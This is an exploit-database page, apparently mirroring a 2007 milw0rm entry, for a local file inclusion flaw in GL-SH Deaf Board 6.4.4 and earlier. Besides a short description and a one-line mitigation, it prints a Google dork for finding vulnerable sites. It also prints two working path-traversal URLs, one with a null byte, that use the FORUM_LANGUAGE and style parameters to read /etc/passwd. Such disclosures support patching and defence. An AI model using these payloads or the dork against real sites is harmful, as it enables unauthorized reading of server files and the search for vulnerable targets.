header-logo
Suggest Exploit
vendor:
Deaf Board
by:
Katatafish
N/A
CVSS
HIGH
Local File Inclusion
File Inclusion
CWE
Product Name: Deaf Board
Affected Version From: <= 6.4.0
Affected Version To: <= 6.4.4
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

GL-SH Deaf Board Version <= 6.4.4 local file inclusion

This exploit allows an attacker to include local files on the server by manipulating the FORUM_LANGUAGE and style parameters in the functions.php and bottom.php files respectively. By using a relative path traversal, the attacker can access sensitive files such as /etc/passwd.

Mitigation:

The vendor should release a patch to sanitize user input and prevent directory traversal attacks. In the meantime, users should ensure that the GL-SH Deaf Board software is not accessible from untrusted networks.
Source

Exploit-DB raw data:

###GL-SH Deaf Board Version <= 6.4.4 local file inclusion###

#download: http://www.frank-karau.de/download/Deafforum_version_6.4.3.zip

#found by: Katatafish (karatatata@hush.com)

#google dork:"2005  www.frank-karau.de" | "2006  www.frank-karau.de"

#exploit:
http://www.site.com/[path]/functions.php?FORUM_LANGUAGE=../../../../../../../../../../../etc/passwd
http://www.site.com/[path]/bottom.php?style=../../../../../../.././etc/passwd%00

# milw0rm.com [2007-06-28]

Navigation

Suggest Exploit

Services By CQR